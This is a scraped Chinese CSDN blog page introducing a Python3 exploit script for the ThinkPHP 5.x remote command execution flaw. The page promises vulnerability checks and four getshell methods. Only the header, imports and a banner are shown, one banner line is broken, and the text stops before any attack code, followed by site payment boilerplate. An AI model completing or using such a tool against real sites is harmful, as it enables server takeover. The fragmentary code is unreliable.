thinkphp python_python3编写ThinkPHP命令执行Getshell的方法

本文详细介绍了如何使用Python3编写代码,针对ThinkPHP 5.x的特定版本进行远程命令执行漏洞验证及获取WebShell的方法。通过发起HTTP请求,检查phpinfo()存在来确认漏洞,并演示了四种不同的getshell方法。
摘要由CSDN通过智能技术生成

加了三个验证漏洞以及四个getshell方法

# /usr/bin/env python3

# -*- coding: utf-8 -*-

# @Author: Morker

# @Email: [email]admin@nsf.me[/email]

# @Blog: [url]http://nsf.me/[/url]

import requests

import sys

def demo():

print(' _______ _ _ _ _____ _ _ _____ ')

print(' |__ __| | (_) | | | __ \| | | | __ \ ')

print(' | | | |__ _ _ __ | | _| |__) | |__| | |__) |')

print(''' | | | '_ \| | '_ \| |/ / ___/| __ | ___/ ''')

print(' | | | | | | | | | |

print(' |_| |_| |_|_|_| |_|_|\_\_| |_| |_|_| ')

print()

print('\tThinkPHP 5.x (v5.0.23 and v5.1.31 following version).')

print('\tRemote command execution exploit.')

print('\tVulnerability verification and getshell.')

print('\tTarget: http://target/publ

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值